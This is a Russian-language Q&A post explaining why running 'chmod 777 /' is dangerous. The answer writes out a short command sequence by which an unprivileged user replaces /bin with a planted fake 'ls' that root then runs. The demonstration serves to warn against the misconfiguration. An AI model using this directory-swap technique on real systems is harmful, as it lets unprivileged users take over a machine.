т.е. sudo chmod / , а не sudo chmod -r / .
Что может получить доступ злоумышленник? Это нормально для персональной машины?
1 ответ
5
Злоумышленник (непривилегированный пользователь) сможет создавать новые каталоги и файлы в корневом каталоге и переименовывать любой существующий каталог в / (например, в случайное значение, эффективно делающее машину непригодной для использования).
В сочетании это позволяет непривилегированным пользователям заменять существующие каталоги собственным контентом. Думаю /bin . Первый:
sudo chmod 777 /
Теперь атакующий (непривилегированный пользователь) часть:
cp -r /bin /newbin
echo "echo boo running my own code as 'whoami'" > /newbin/ls
chmod +x /newbin/ls
mv /bin /oldbin
/oldbin/mv /newbin /bin
Теперь проверьте это:
sudo -i
ls
Это эффективно дает злоумышленнику простой способ владеть машиной.